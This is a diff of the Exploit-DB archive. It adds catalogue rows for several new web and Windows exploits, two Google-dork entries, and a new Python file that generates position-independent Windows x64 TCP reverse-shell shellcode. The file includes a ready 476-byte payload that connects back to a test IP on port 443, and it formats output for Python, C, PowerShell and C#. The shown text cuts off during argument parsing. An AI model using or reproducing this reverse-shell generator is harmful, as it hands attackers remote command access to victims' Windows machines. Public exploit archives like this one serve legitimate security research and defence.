 31673,exploits/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,webapps,multiple,,2008-04-18,2014-02-16,1,,,,,,https://www.securityfocus.com/bid/28848/info
 35233,exploits/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,webapps,multiple,,2011-01-18,2014-11-13,1,,,,,,https://www.securityfocus.com/bid/45911/info
 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 -  Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,,2020-09-25,2020-09-25,0,,,,,,
@@ -17234,6 +17236,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10575,exploits/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,webapps,php,,2009-12-20,,0,,,,,,
 9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,,
 3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip,
+51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info
 22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info
 1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip,
@@ -21962,6 +21965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6955,exploits/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,webapps,php,,2008-11-01,,1,OSVDB-49511;CVE-2008-6269,,,,,
 45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-11,1,CVE-2018-15918,"SQL Injection (SQLi)",,http://www.exploit-db.com/screenshots/idlt45500/45340.png,,
 45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-06,0,CVE-2018-15917,"Cross-Site Scripting (XSS)",,,,
+51715,exploits/php/webapps/51715.txt,"Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 39128,exploits/php/webapps/39128.txt,"Jorjweb - 'id' SQL Injection",2014-02-21,"Vulnerability Laboratory",webapps,php,,2014-02-21,2015-12-29,1,OSVDB-104937,,,,,https://www.securityfocus.com/bid/66377/info
 8752,exploits/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,webapps,php,,2009-05-19,,1,OSVDB-61537,,,,,
 5091,exploits/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Remote Code Execution",2008-02-09,Iron,webapps,php,,2008-02-08,2016-11-14,1,OSVDB-40596;CVE-2007-5056,,,,http://www.exploit-db.comJournalness_4.1_Full.tar.gz,
@@ -30003,6 +30007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,webapps,php,,2007-03-10,,1,OSVDB-33986;CVE-2007-1425,,,,,
 36196,exploits/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,webapps,php,,2011-10-02,2015-02-27,1,CVE-2011-5169;OSVDB-76185,,,,,https://www.securityfocus.com/bid/49906/info
 2216,exploits/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - 'folder' Include",2006-08-18,"Philipp Niedziela",webapps,php,,2006-08-17,,1,OSVDB-28033;CVE-2006-4311,,,,,
+51718,exploits/php/webapps/51718.txt,"soosyze 2.0.0 - File Upload",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php,,2017-02-21,2017-07-18,1,CVE-2016-9553,,,,,
 40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php,,2016-11-07,2016-11-07,1,,,,,,
 42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php,,2017-05-16,2017-07-18,1,CVE-2017-6412,,,,,
@@ -30024,6 +30029,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip,
 11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,,
 51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,,
+51714,exploits/php/webapps/51714.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection",2023-09-08,CraCkEr,webapps,php,,2023-09-08,2023-09-08,0,CVE-2023-4548,,,,,
 12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,,
 12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php,,2010-05-09,,1,,,,,,
 12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php,,2010-05-25,,1,,,,,,
@@ -32927,6 +32933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38019,exploits/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",webapps,php,,2012-11-09,2015-08-30,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56479/info
 17284,exploits/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,webapps,php,,2011-05-14,2011-05-14,0,,"WordPress Plugin",,,http://www.exploit-db.comeditormonkey.tar.gz,
 20270,exploits/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",webapps,php,,2012-08-05,2012-08-05,0,OSVDB-84462,"WordPress Plugin",,,,
+51716,exploits/php/webapps/51716.txt,"Wordpress Plugin Elementor 3.5.5 - Iframe Injection",2023-09-08,"Miguel Santareno",webapps,php,,2023-09-08,2023-09-08,0,CVE-2022-4953,,,,,
 50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",2022-04-19,AkuCyberSec,webapps,php,,2022-04-19,2022-04-22,0,,,,,,
 37356,exploits/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",webapps,php,,2012-06-07,2015-06-24,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53850/info
 43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,,2018-01-24,2018-01-24,1,,,,,http://www.exploit-db.comemail-subscribers.3.4.7.zip,
@@ -33913,6 +33920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
+51717,exploits/php/webapps/51717.py,"Wp2Fac - OS Command Injection",2023-09-08,"Ahmet Ümit BAYRAM",webapps,php,,2023-09-08,2023-09-08,0,,,,,,
 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@@ -34680,7 +34688,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
-51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
+51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-09-08,1,,,,,,
 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
 51276,exploits/python/webapps/51276.go,"modoboa  2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,,
 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
@@ -38682,6 +38690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,,2017-10-27,2018-03-02,0,,,,,,
 43453,exploits/windows/dos/43453.py,"Sync Breeze Enterprise 10.1.16 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,,2018-01-08,2018-01-08,0,CVE-2017-15664,,,,http://www.exploit-db.comsyncbreezesrv_setup_v10.1.16.exe,
 44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,,2020-06-10,2020-06-10,0,,,,,,
+51725,exploits/windows/dos/51725.py,"SyncBreeze 15.2.24 - 'login' Denial of Service",2023-09-08,"mohamed youssef",dos,windows,,2023-09-08,2023-09-08,0,,,,,,
 41475,exploits/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",dos,windows,,2017-02-28,2017-02-28,0,CVE-2017-6371,,,,http://www.exploit-db.comsbbs316c.zip,
 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,,2020-01-20,2020-01-20,0,,,,,,
 24940,exploits/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",dos,windows,,2013-04-09,2013-04-09,1,OSVDB-92081,,,,http://www.exploit-db.comsysaxserv_setup_6.10.msi,
@@ -40135,6 +40144,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7702,exploits/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Local Stack Overflow",2009-01-08,DATA_SNIPER,local,windows,,2009-01-07,,1,,,,,http://www.exploit-db.comGOMPLAYERENSETUP_v2.0.12.EXE,http://secunia.com/advisories/23994
 18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",local,windows,,2011-11-30,2011-11-30,1,CVE-2011-5162;OSVDB-33080;CVE-2007-0707,,,http://www.exploit-db.com/screenshots/idlt18500/18174.png,,
 30154,exploits/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Local Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",local,windows,,2013-12-10,2013-12-10,1,CVE-2013-6356,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-10-at-64257-pm.png,,
+51724,exploits/windows/local/51724.py,"GOM Player 2.3.90.5360 - Buffer Overflow (PoC)",2023-09-08,"Ahmet Ümit BAYRAM",local,windows,,2023-09-08,2023-09-08,0,,,,,,
 14790,exploits/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows,,2010-08-25,2010-08-26,1,CVE-2010-3134;OSVDB-67539,,,,,
 11152,exploits/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,local,windows,,2010-01-15,,1,,,,,http://www.exploit-db.comGoogleSketchUpWEN.exe,http://www.coresecurity.com/content/google-sketchup-vulnerability
 963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows,,2005-04-27,,1,OSVDB-14686;CVE-2005-1424,,,,,
@@ -42945,6 +42955,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 969,exploits/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,remote,windows,21,2005-04-28,2011-04-28,1,OSVDB-14369;CVE-2005-0634,,,,http://www.exploit-db.comGolden_FTP_Server_Pro_v2.50.zip,
 16572,exploits/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-5779;OSVDB-38282,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/27418/
 4579,exploits/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,remote,windows,,2007-10-28,2016-10-20,1,OSVDB-38282;CVE-2007-5779,,,,http://www.exploit-db.comgom2163499.exe,
+51719,exploits/windows/remote/51719.py,"GOM Player 2.3.90.5360 - Remote Code Execution (RCE)",2023-09-08,"M. Akil Gündoğan",remote,windows,,2023-09-08,2023-09-08,0,,,,,,
 6804,exploits/windows/remote/6804.pl,"GoodTech SSH - 'SSH_FXP_OPEN' Remote Buffer Overflow",2008-10-22,r0ut3r,remote,windows,22,2008-10-21,,1,OSVDB-49249;CVE-2008-4726,,,,,
 16817,exploits/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,2380,2010-05-09,2011-03-07,1,CVE-2005-0768;OSVDB-14806,"Metasploit Framework (MSF)",,,,
 883,exploits/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,remote,windows,2380,2005-04-23,,1,,,,,,

files_shellcodes.csv

@@ -933,6 +933,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,,
 51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,,
 51634,shellcodes/windows/51634.py,"Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)",2023-07-28,Senzee,,windows,169,2023-07-28,2023-07-28,0,,,,,,
+51721,shellcodes/windows/51721.py,"Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)",2023-09-08,Senzee,,windows,476,2023-09-08,2023-09-08,0,,,,,,
 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php
 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php
 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php

ghdb.xml

@@ -37668,6 +37668,21 @@ stag_1</textualDescription>
   <date>2021-11-05</date>
   <author>Veeresh Appasaheb Patil</author>
  </entry>
+ <entry>
+  <id>8223</id>
+  <link>https://www.exploit-db.com/ghdb/8223</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>index of cpanel.txt</shortDescription>
+  <textualDescription># Google Dork: index of cpanel.txt
+# Files Containing Juicy Info
+# Date: 08/09/2023
+# Author: Ved Kolambkar</textualDescription>
+  <query>new google dork</query>
+  <querystring>https://www.google.com/search?q=new google dork</querystring>
+  <edb></edb>
+  <date>2023-09-08</date>
+  <author>Ved Kolambkar</author>
+ </entry>
  <entry>
   <id>7025</id>
   <link>https://www.exploit-db.com/ghdb/7025</link>
@@ -49339,6 +49354,21 @@ Maxime Westhoven
   <date>2019-10-18</date>
   <author>Maxime Westhoven</author>
  </entry>
+ <entry>
+  <id>8222</id>
+  <link>https://www.exploit-db.com/ghdb/8222</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.</shortDescription>
+  <textualDescription># Google Dork: inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.
+# Files Containing Juicy Info
+# Date: 08/09/2023
+# Exploit Jannatul Adnin</textualDescription>
+  <query>My name is Jannatul Adnin and I would like to report a new Google dork.</query>
+  <querystring>https://www.google.com/search?q=My name is Jannatul Adnin and I would like to report a new Google dork.</querystring>
+  <edb></edb>
+  <date>2023-09-08</date>
+  <author>Jannatul Adnin</author>
+ </entry>
  <entry>
   <id>8118</id>
   <link>https://www.exploit-db.com/ghdb/8118</link>

shellcodes/windows/51721.py

@@ -0,0 +1,377 @@
+import ctypes, struct
+import argparse
+from keystone import *
+
+# Exploit Title: Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
+# Exploit Author: Senzee
+# Date: 08/29/2023
+# Platform: Windows X64
+# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter
+# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763
+# Test IP: 192.168.1.45
+# Test Port: 443
+# Payload size: 476 bytes
+# NUll-Free: True
+# Detailed information can be found at https://github.com/senzee1984/micr0_shell
+
+
+
+# Generated Shellcode (192.168.1.45:443):
+# Payload size: 476 bytes
+# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"
+# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"
+# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"
+# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"
+# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"
+# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"
+# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x4c\x89\xcd\x41\xb8\x8e\x4e\x0e\xec\xe8\x8f\xff\xff"
+# buf += b"\xff\x49\x89\xc4\x48\x31\xc0\x66\xb8\x6c\x6c\x50\x48\xb8\x57\x53\x32\x5f\x33\x32"
+# buf += b"\x2e\x64\x50\x48\x89\xe1\x48\x83\xec\x20\x4c\x89\xe0\xff\xd0\x48\x83\xc4\x20\x49"
+# buf += b"\x89\xc6\x49\x89\xc1\x41\xb8\xcb\xed\xfc\x3b\x4c\x89\xcb\xe8\x55\xff\xff\xff\x48"
+# buf += b"\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec"
+# buf += b"\x30\xff\xd0\x48\x83\xc4\x30\x49\x89\xd9\x41\xb8\xd9\x09\xf5\xad\xe8\x2b\xff\xff"
+# buf += b"\xff\x48\x83\xec\x30\x48\x31\xc9\xb1\x02\x48\x31\xd2\xb2\x01\x4d\x31\xc0\x41\xb0"
+# buf += b"\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd0\x49\x89\xc4\x48"
+# buf += b"\x83\xc4\x30\x49\x89\xd9\x41\xb8\x0c\xba\x2d\xb3\xe8\xf3\xfe\xff\xff\x48\x83\xec"
+# buf += b"\x20\x4c\x89\xe1\x48\x31\xd2\xb2\x02\x48\x89\x14\x24\x48\x31\xd2\x66\xba\x01\xbb"
+# buf += b"\x48\x89\x54\x24\x02\xba\xc0\xa8\x01\x2d\x48\x89\x54\x24\x04\x48\x8d\x14\x24\x4d"
+# buf += b"\x31\xc0\x41\xb0\x16\x4d\x31\xc9\x48\x83\xec\x38\x4c\x89\x4c\x24\x20\x4c\x89\x4c"
+# buf += b"\x24\x28\x4c\x89\x4c\x24\x30\xff\xd0\x48\x83\xc4\x38\x49\x89\xe9\x41\xb8\x72\xfe"
+# buf += b"\xb3\x16\xe8\x99\xfe\xff\xff\x48\xba\x9c\x92\x9b\xd1\x9a\x87\x9a\xff\x48\xf7\xd2"
+# buf += b"\x52\x48\x89\xe2\x41\x54\x41\x54\x41\x54\x48\x31\xc9\x66\x51\x51\x51\xb1\xff\x66"
+# buf += b"\xff\xc1\x66\x51\x48\x31\xc9\x66\x51\x66\x51\x51\x51\x51\x51\x51\x51\xb1\x68\x51"
+# buf += b"\x48\x89\xe7\x48\x89\xe1\x48\x83\xe9\x20\x51\x57\x48\x31\xc9\x51\x51\x51\x48\xff"
+# buf += b"\xc1\x51\xfe\xc9\x51\x51\x51\x51\x49\x89\xc8\x49\x89\xc9\xff\xd0"
+
+
+def print_banner():
+	banner="""
+███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
+████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
+██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
+██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
+██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗
+╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
+"""
+	print(banner)
+	print("Author: Senzee")
+	print("Original Github Repository: https://github.com/senzee1984/micr0_shell")
+	print("Description: Dynamically generate PIC Null-Free Windows X64 TCP Reverse Shell Shellcode")
+	print("This version does not support shellcode execution")
+	print("Attention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\n\n")
+
+
+def get_port_argument(port):
+	port_hex_str = format(port, '04x')
+	port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]
+	if "00" in {port_part_1, port_part_2}:
+		port += 257
+		port_hex_str = format(port, '04x')
+		port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]
+		return f"mov dx, 0x{port_part_1 + port_part_2};\nsub dx, 0x101;"
+	return f"mov dx, 0x{port_part_1 + port_part_2};"
+
+
+def get_ip_argument(ip):
+	ip_hex_parts = [format(int(part), '02x') for part in ip.split('.')]
+	reversed_hex = ''.join(ip_hex_parts[::-1])
+	if "00" in ip_hex_parts and "ff" not in ip_hex_parts:
+		hex_int = int(reversed_hex, 16)
+		neg_hex = (0xFFFFFFFF + 1 - hex_int) & 0xFFFFFFFF
+		return f"mov edx, 0x{neg_hex:08x};\nneg rdx;"
+	return f"mov edx, 0x{reversed_hex};"
+
+
+def get_shell_type_argument(shell_type):
+	if shell_type == "cmd":
+		return f"mov rdx, 0xff9a879ad19b929c;\nnot rdx;"
+	return (f"sub rsp, 8;\nmov rdx, 0xffff9a879ad19393;\nnot rdx;\npush rdx;"
+            f"\nmov rdx, 0x6568737265776f70;")
+
+
+def output_shellcode(lan,encoding,var,save):
+	sh = b""
+	for e in encoding:
+    		sh += struct.pack("B", e)
+	shellcode = bytearray(sh)
+	print("[+]Payload size: "+str(len(encoding))+" bytes\n")
+	counter=0
+
+	if lan=="python":
+		print("[+]Shellcode format for Python\n")
+		sc = ""
+		sc = var+" = b\""
+		for dec in encoding:
+    			if counter % 20 == 0 and counter != 0:
+        			sc += "\"\n"+var+"+="+"b\""
+    			sc += "\\x{0:02x}".format(int(dec))
+    			counter += 1
+
+		if count % 20 > 0:
+			sc += "\""
+		print(sc)
+
+	elif lan=="c":
+		print("[+]Shellcode format for C\n")
+		sc = "unsigned char " + var + "[]={\n"
+		for dec in encoding:
+    			if counter % 20 == 0 and counter != 0:
+        			sc += "\n"
+    			sc += "0x{0:02x}".format(int(dec))+","
+    			counter += 1
+		sc=sc[0:len(sc)-1]+"};"
+		print(sc)
+
+
+	elif lan=="powershell":
+		print("[+]Shellcode format for Powershell\n")
+		sc = "[Byte[]] $"+var+" = "
+		for dec in encoding:
+    			sc += "0x{0:02x}".format(int(dec))+","
+		sc=sc[0:len(sc)-1]
+		print(sc)
+
+	elif lan=="csharp":
+		print("[+]Shellcode format for C#\n")
+		sc = "byte[] " + var + "= new byte["+str(len(encoding))+"] {\n"
+		for dec in encoding:
+    			if counter % 20 == 0 and counter != 0:
+        			sc += "\n"
+    			sc += "0x{0:02x}".format(int(dec))+","
+    			counter += 1
+		sc=sc[0:len(sc)-1]+"};"
+		print(sc)
+
+	else:
+		print("Unsupported language! Exiting...")
+		exit()
+
+
+	if save=="true":
+		try:
+			with open(output, 'wb') as f:
+				f.write(shellcode)
+				print("\n\nGenerated shellcode successfully saved in file "+output)
+		except Exception as e:
+			print(e)
+
+
+if __name__ == "__main__":
+	print_banner()
+	parser = argparse.ArgumentParser(description='Dynamically generate Windows x64 reverse shell.')
+	parser.add_argument('--ip', '-i', required=True, dest='ip',help='The listening IP address, default value is 192.168.0.45')
+	parser.add_argument('--port', '-p', required=False, default=443, dest='port',help='The local listening port, default value is 443')
